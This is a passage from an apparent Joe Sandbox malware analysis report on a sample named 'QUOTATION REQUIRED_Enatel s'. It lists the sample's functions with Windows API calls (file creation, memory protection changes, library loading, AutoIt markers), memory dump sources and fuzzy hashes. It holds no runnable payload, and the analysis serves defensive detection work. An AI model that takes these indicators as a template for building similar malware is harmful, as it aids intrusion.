                                                                                                                      • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F11C22
                                                                                                                      • Part of subcall function 00F11B4A: RegisterWindowMessageW.USER32(00000004,?,00F112C4), ref: 00F11BA2
                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F1136A
                                                                                                                    • OleInitialize.OLE32 ref: 00F11388
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00F524AB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1986988660-0
                                                                                                                    • Opcode ID: d457c21cee50b8a44737cee8bd217f3063f94c6f6e912b5994b1a1adb5982943
                                                                                                                    • Instruction ID: e6568cf6cbb5c4c51e84106542e43b694424b6494599af787a4f5eac891db5d7
                                                                                                                    • Opcode Fuzzy Hash: d457c21cee50b8a44737cee8bd217f3063f94c6f6e912b5994b1a1adb5982943
                                                                                                                    • Instruction Fuzzy Hash: BC7191B59013C88FC784DF7BAD856993AE1FB89344798422AD10ACF362EB344585FF51
                                                                                                                    Function 00F486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,00F485CC,?,00FD8CC8,0000000C), ref: 00F48704
                                                                                                                    • GetLastError.KERNEL32(?,00F485CC,?,00FD8CC8,0000000C), ref: 00F4870E
                                                                                                                    • __dosmaperr.LIBCMT ref: 00F48739
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2583163307-0
                                                                                                                    • Opcode ID: 917d4ebf4581bf70158a0113f45076b9ac435105ba5324115e0ee361471ff4bc
                                                                                                                    • Instruction ID: 43dc4dc8034392dffefcd9f4d8ec7f7eeb0dd22775cfd2e556e799ac3553032e
                                                                                                                    • Opcode Fuzzy Hash: 917d4ebf4581bf70158a0113f45076b9ac435105ba5324115e0ee361471ff4bc
                                                                                                                    • Instruction Fuzzy Hash: B1010833E0566427D6A57634AC85B7E7F4A4B82BB4F2A0119EC188B1D3DEA48C83B190
                                                                                                                    Function 00F21310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F217F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID: CALL
                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                    • Opcode ID: 15358113365db2bf12e5d8daddd19f273df22162138382fc468d25e34efa5bea
                                                                                                                    • Instruction ID: 5dd6214eaf8403dbe0fe980ee1c3ceb2769583972ae746bd35bc06f3824f5b7f
                                                                                                                    • Opcode Fuzzy Hash: 15358113365db2bf12e5d8daddd19f273df22162138382fc468d25e34efa5bea
                                                                                                                    • Instruction Fuzzy Hash: 6422BB70A083119FC714DF14D891B2ABBF1BF95314F28896DF48A8B3A1D735E845EB86
                                                                                                                    Function 00F12DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00F52C8C
                                                                                                                      • Part of subcall function 00F13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F13A97,?,?,00F12E7F,?,?,?,00000000), ref: 00F13AC2
                                                                                                                      • Part of subcall function 00F12DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F12DC4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 779396738-3081909835
                                                                                                                    • Opcode ID: f60d69b3b0bd957922de1f5b72a9bed2b903e181c91d5fad382068f5481308bb
                                                                                                                    • Instruction ID: 9c9054675554ff0a3bb947527de47a535f5a08baf398273c418505fe03dcf840
                                                                                                                    • Opcode Fuzzy Hash: f60d69b3b0bd957922de1f5b72a9bed2b903e181c91d5fad382068f5481308bb
                                                                                                                    • Instruction Fuzzy Hash: 4E210571A002589FCB41DF94CC45BEE7BF8AF49310F00801AE405E7341DBB85A89AFA1
                                                                                                                    Function 00F13837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F13908
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    • Opcode ID: 2023d7364f33daa5c51a260a9dca6fb24bab5e44985b2d9cc725ab84c6de402c
                                                                                                                    • Instruction ID: 30db3f92a5de18314aefe82e30b5aa73186039098bc412e6e35c70d63497264c
                                                                                                                    • Opcode Fuzzy Hash: 2023d7364f33daa5c51a260a9dca6fb24bab5e44985b2d9cc725ab84c6de402c
                                                                                                                    • Instruction Fuzzy Hash: BE31B4B1904305DFD721DF25D8847D7BBE8FB49728F00092EF99997240E771AA84EB92
                                                                                                                    Function 00F15745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F1949C,?,00008000), ref: 00F15773
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00F1949C,?,00008000), ref: 00F54052
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: dc141f4dc9ebf74aee2df1d6316b1b805d3f4d78a43470ba73ea681057fffc67
                                                                                                                    • Instruction ID: ed478240d59db05448fe69c3e03fca08ce211f02705d14cee55e8693798cec44
                                                                                                                    • Opcode Fuzzy Hash: dc141f4dc9ebf74aee2df1d6316b1b805d3f4d78a43470ba73ea681057fffc67
                                                                                                                    • Instruction Fuzzy Hash: 34018431645225F6E3314A25CC0EF977F54DF42B74F108200BF5C5A1E0CBB45494DB90
                                                                                                                    Function 00F1B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F1BB4E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1385522511-0
                                                                                                                    • Opcode ID: be4d01d22a515dd4e18d15e39cbb337afc691aa7931003ebb53bc082d02bbab4
                                                                                                                    • Instruction ID: 36a32d1920e086faa718b2cb44f913da10fbe1e5ca94b30fadab2c08f570272b
                                                                                                                    • Opcode Fuzzy Hash: be4d01d22a515dd4e18d15e39cbb337afc691aa7931003ebb53bc082d02bbab4
                                                                                                                    • Instruction Fuzzy Hash: D332BC31E04209DFDB14CF54C895BBEB7B9EF44324F248059E905AB291DB78ED82EB91
                                                                                                                    Function 00F9709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2948472770-0
                                                                                                                    • Opcode ID: c5f7881985fe88755c64059e606e3cb407dad0cef270d0990345194863dff0dc
                                                                                                                    • Instruction ID: a5a0859f7432d5454b1035672436a39a4a28328070a835d8cbea63316b3aac1f
                                                                                                                    • Opcode Fuzzy Hash: c5f7881985fe88755c64059e606e3cb407dad0cef270d0990345194863dff0dc
                                                                                                                    • Instruction Fuzzy Hash: 11D15A71E04209EFDF14EF98D8819EDBBB5FF48320F144059E915AB291EB34AD81EB90
                                                                                                                    Function 015FDDA8 Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 015FD618: GetFileAttributesW.KERNELBASE(?), ref: 015FD623
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 015FDEFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesCreateDirectoryFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3401506121-0
                                                                                                                    • Opcode ID: dec17f749794ce8c44c2f546b35acdd966cecf1849dd027e233acbd8a6bc549d
                                                                                                                    • Instruction ID: fc55aba7b079e2849e22095dd141b799b8585fb26b85551141ad57345a321bf8
                                                                                                                    • Opcode Fuzzy Hash: dec17f749794ce8c44c2f546b35acdd966cecf1849dd027e233acbd8a6bc549d
                                                                                                                    • Instruction Fuzzy Hash: 37517431A1120996EF14EFA0C854BEF7339FF98300F10856DA609FB290EB799B44C7A5
                                                                                                                    Function 00F2FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction ID: 8a5420aadb0c102411aef3bcb7238b45e79898679a6826f0640279edc3409f08
                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction Fuzzy Hash: FE311375A101199BC718CF59E090A69F7B1FB49310BA482B5E809CB612D731EEC4EBC0
                                                                                                                    Function 00F14ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F14E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F14EDD,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E9C
                                                                                                                      • Part of subcall function 00F14E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F14EAE
                                                                                                                      • Part of subcall function 00F14E90: FreeLibrary.KERNEL32(00000000,?,?,00F14EDD,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14EC0
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14EFD
                                                                                                                      • Part of subcall function 00F14E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F53CDE,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E62
                                                                                                                      • Part of subcall function 00F14E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F14E74
                                                                                                                      • Part of subcall function 00F14E59: FreeLibrary.KERNEL32(00000000,?,?,00F53CDE,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E87
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2632591731-0
                                                                                                                    • Opcode ID: 47dc252553f6f1f97933d7a55d40c0e5fdfebb3f368647587fdd1c0832906d3f
                                                                                                                    • Instruction ID: 7c4fd768e06003a03fd7215689cc6f328e47163474c8d98fdcc7221eb9522e26
                                                                                                                    • Opcode Fuzzy Hash: 47dc252553f6f1f97933d7a55d40c0e5fdfebb3f368647587fdd1c0832906d3f
                                                                                                                    • Instruction Fuzzy Hash: B411C432600205AACB14AB64DC16BED77A59F80B11F104429F552AB2C1DE79AA85BB90
                                                                                                                    Function 00F48402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wsopen_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3347428461-0
                                                                                                                    • Opcode ID: c547e861a7ea58f3fb63933a3f90be7dc28211399209b0bbbffebc3d7202c777
                                                                                                                    • Instruction ID: b1348e60669165dffedd977325e802420dee80743b45e1e77e8aba4e12f070bb
                                                                                                                    • Opcode Fuzzy Hash: c547e861a7ea58f3fb63933a3f90be7dc28211399209b0bbbffebc3d7202c777
                                                                                                                    • Instruction Fuzzy Hash: B811487590410AAFCB05DF58E9409DE7BF4EF48350F104059FC08AB312DA31DA12DBA4
                                                                                                                    Function 00F45000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F44C7D: RtlAllocateHeap.NTDLL(00000008,00F11129,00000000,?,00F42E29,00000001,00000364,?,?,?,00F3F2DE,00F43863,00FE1444,?,00F2FDF5,?), ref: 00F44CBE
                                                                                                                    • _free.LIBCMT ref: 00F4506C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                    • Instruction ID: ff90fb87b764b0ec56c90a04c0efa511c8b6e3c4408ac02fd16debd44b9b5b2d
                                                                                                                    • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                    • Instruction Fuzzy Hash: C40126766047056BE3219E699C81A9AFFE9FB89370F65052DE98493281EA30A805C6B4
                                                                                                                    Function 00F3E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                    • Instruction ID: 24f438c6a63d8f5c54042046d145140a00ba9f03643c7180cc27d8267d420e4a
                                                                                                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                    • Instruction Fuzzy Hash: C5F02832921A1497D7313A6ADC06B9B3B989F52375F100729FC20931D2CB7CE802BAA5
                                                                                                                    Function 00F19CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 176396367-0
                                                                                                                    • Opcode ID: 925dd5c5bacb953470c4b1c403d787b0688307d40fd5fb7636ab76acd22fdb11
                                                                                                                    • Instruction ID: 230e4edc6d13b341f8535f351436f4934cf2ad1775f6ce4efa4675ec65c996a7
                                                                                                                    • Opcode Fuzzy Hash: 925dd5c5bacb953470c4b1c403d787b0688307d40fd5fb7636ab76acd22fdb11
                                                                                                                    • Instruction Fuzzy Hash: BDF028B36006016ED7109F28DC02BA7BBA8EB44770F10853AF619CB1D1DB75E45497E0
                                                                                                                    Function 00F44C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00F11129,00000000,?,00F42E29,00000001,00000364,?,?,?,00F3F2DE,00F43863,00FE1444,?,00F2FDF5,?), ref: 00F44CBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
